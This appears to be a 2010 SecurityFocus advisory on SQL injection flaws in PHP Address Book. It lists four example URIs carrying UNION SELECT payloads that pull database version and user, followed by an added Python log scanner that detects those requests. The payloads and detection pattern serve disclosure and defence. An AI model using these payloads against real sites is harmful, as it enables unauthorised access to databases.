PHP Address Book Multiple SQL Injection Vulnerabilities

Attackers can use a browser to exploit these issues.

The following example URIs are available:

http://www.example.com/[PATH]/view.php?id=-999%27+union+select%201,@@version,3,4,5,6,7,8,9,10,11,12,13,14%23
http://www.example.com/[PATH]/edit.php?id=-1%27+union+select%201,@@version,user(),4,5,6,7,8,9,10,11,12,13,14%
http://www.example.com/[PATH]/index.php?alphabet=-1%27+union+all+select+1,2,user(),4,5,6,7,8,9,10,11,12,13,14%23
http://www.example.com/[PATH]/delete.php?id=-1+UNION+ALL+SELECT+1,@@version,user(),4,5,6,7,8,9,10,11,12,13,14%23
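
A defender-side check for the request pattern in the URIs above, added here as an example and not part of the original advisory: it URL-decodes the `id` and `alphabet` parameters of the four listed scripts in web access log lines and flags values containing `UNION [ALL] SELECT`. The log lines, the `/ab/` install path and all function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Scripts and parameters named in the advisory's example URIs.
WATCHED = {"view.php": {"id"}, "edit.php": {"id"},
           "index.php": {"alphabet"}, "delete.php": {"id"}}

# UNION [ALL] SELECT in the decoded value; whitespace or /* */ comments may separate keywords.
SEP = r"(?:\s|/\*.*?\*/)+"
UNION_RE = re.compile(rf"union{SEP}(?:all{SEP})?select", re.I | re.S)
# Request line of a common/combined-format access log entry.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def suspicious_params(target):
    """Return [(script, param, decoded_value)] for watched params carrying UNION SELECT."""
    parts = urlsplit(target)
    script = parts.path.rsplit("/", 1)[-1].lower()
    hits = []
    # parse_qsl percent-decodes and turns '+' into a space, as PHP does for $_GET.
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if name in WATCHED.get(script, ()) and UNION_RE.search(value):
            hits.append((script, name, value))
    return hits

def scan(lines):
    """Yield (line_number, script, param, decoded_value) for each flagged request."""
    for n, line in enumerate(lines, 1):
        m = REQUEST_RE.search(line)
        if m:
            for hit in suspicious_params(m.group(1)):
                yield (n, *hit)

# Constructed sample log (documentation IP range, hypothetical /ab/ path).
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2010:10:00:01 +0000] "GET /ab/view.php?id=-999%27+union+select%201,@@version,3%23 HTTP/1.1" 200 512',
    '203.0.113.8 - - [01/Jan/2010:10:00:02 +0000] "GET /ab/view.php?id=42 HTTP/1.1" 200 734',
    '203.0.113.7 - - [01/Jan/2010:10:00:03 +0000] "GET /ab/index.php?alphabet=-1%27+union+all+select+1,2,user()%23 HTTP/1.1" 200 498',
    '203.0.113.9 - - [01/Jan/2010:10:00:04 +0000] "GET /ab/index.php?alphabet=s HTTP/1.1" 200 1290',
    '203.0.113.7 - - [01/Jan/2010:10:00:05 +0000] "GET /ab/delete.php?id=-1+UNION+ALL+SELECT+1,@@version%23 HTTP/1.1" 200 301',
]

if __name__ == "__main__":
    for n, script, param, value in scan(SAMPLE_LOG):
        print(f"line {n}: {script} {param}={value!r}")
```

Matching happens after decoding, so `%27`, `+` and `%20` variants of the same request are all caught; a hit is a lead for review, not proof that the query succeeded.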


 

Copyright 2010, SecurityFocus